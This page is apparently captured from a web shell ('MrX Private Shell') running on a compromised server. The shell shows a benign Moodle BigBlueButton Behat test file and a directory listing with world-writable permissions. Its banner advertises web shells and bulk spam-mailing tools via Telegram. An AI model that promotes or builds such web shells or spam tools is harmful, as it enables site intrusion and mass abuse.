__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@mod @mod_bigbluebuttonbn
Feature: The recording can be managed through the room page
  As a user I am able to see the relevant recording for a given bigbluebutton activity and modify its parameters

  Background:  Make sure that import recording is enabled and course, activities and recording exists
    Given a BigBlueButton mock server is configured
    And I enable "bigbluebuttonbn" "mod" plugin
    And the following "courses" exist:
      | fullname      | shortname | category |
      | Test Course 1 | C1        | 0        |
      | Test Course 2 | C2        | 0        |
    And the following "users" exist:
      | username | firstname | lastname | email             |
      | user1    | User      | 1        | user1@example.com |
    And the following "activities" exist:
      | activity        | name           | intro                           | course | idnumber         | type | recordings_imported |
      | bigbluebuttonbn | RoomRecordings | Test Room Recording description | C1     | bigbluebuttonbn1 | 0    | 0                   |
    And the following "mod_bigbluebuttonbn > meeting" exists:
      | activity | RoomRecordings |
    And the following "mod_bigbluebuttonbn > recordings" exist:
      | bigbluebuttonbn | name        | description   | status |
      | RoomRecordings  | Recording 1 | Description 1 | 2      |
      | RoomRecordings  | Recording 2 | Description 2 | 3      |
      | RoomRecordings  | Recording 3 | Description 3 | 0      |
      | RoomRecordings  | Recording 4 | Description 4 | 1      |

  @javascript
  Scenario: I can see the recordings related to an activity
    Given I am on the "RoomRecordings" "bigbluebuttonbn activity" page logged in as admin
    And "Recording 1" "table_row" should exist
    And "Recording 2" "table_row" should exist
    And "Recording 3" "table_row" should not exist
    And "Recording 4" "table_row" should not exist
    # Recording 3 will be fetched and metadata will be present so, we will see it.
    When the BigBlueButtonBN server has sent recording ready notifications
    And I run the scheduled task "mod_bigbluebuttonbn\task\check_pending_recordings"
    And I reload the page
    Then "Recording 1" "table_row" should exist
    And "Recording 2" "table_row" should exist
    And "Recording 3" "table_row" should exist
    And "Recording 4" "table_row" should not exist

  @javascript
  Scenario: I can rename the recording
    Given I am on the "RoomRecordings" "bigbluebuttonbn activity" page logged in as admin
    When I set the field "Edit name" in the "Recording 1" "table_row" to "Recording with an updated name 1"
    Then I should see "Recording with an updated name 1"
    And I should see "Recording 2"
    And I reload the page
    And I should see "Recording with an updated name 1"
    And I should see "Recording 2"

  @javascript
  Scenario: I can set a new description for this recording
    Given I am on the "RoomRecordings" "bigbluebuttonbn activity" page logged in as admin
    When I set the field "Edit description" in the "Recording 1" "table_row" to "This is a new recording description 1"
    Then I should see "This is a new recording description 1"
    And I should see "Description 2" in the "Recording 2" "table_row"
    And I reload the page
    And I should see "This is a new recording description 1" in the "Recording 1" "table_row"
    And I should see "Description 2" in the "Recording 2" "table_row"

  @javascript
  Scenario: I can delete a recording
    Given I am on the "RoomRecordings" "bigbluebuttonbn activity" page logged in as admin
    And I change window size to "large"
    When I click on "a[data-action='delete']" "css_element" in the "Recording 1" "table_row"
    And I click on "OK" "button" in the "Confirm" "dialogue"
    Then I should not see "Recording 1"
    And I should see "Recording 2"
    And I reload the page
    And I should not see "Recording 1"
    And I should see "Recording 2"

Filemanager

Name Type Size Permission Actions
fixtures Folder 0777
add_instance.feature File 2.57 KB 0777
add_instance_in_empty_state.feature File 2.36 KB 0777
behat_mod_bigbluebuttonbn.php File 10.28 KB 0777
bigbluebuttonbn_activity_availability.feature File 2.31 KB 0777
completion.feature File 3.48 KB 0777
edit_instance.feature File 3.06 KB 0777
end_meeting.feature File 4.45 KB 0777
group_mode.feature File 7.95 KB 0777
guest_access.feature File 4.28 KB 0777
join_meeting.feature File 2.97 KB 0777
join_meeting_as_guest.feature File 2.4 KB 0777
lock_settings.feature File 2.99 KB 0777
meeting_roles.feature File 1.78 KB 0777
recordings.feature File 3.85 KB 0777
recordings_import.feature File 6.96 KB 0777
roles.feature File 1.11 KB 0777
room.feature File 2.22 KB 0777
start_meeting.feature File 4.41 KB 0777
subplugins.feature File 5.99 KB 0777
view_presentation.feature File 2.96 KB 0777
Filemanager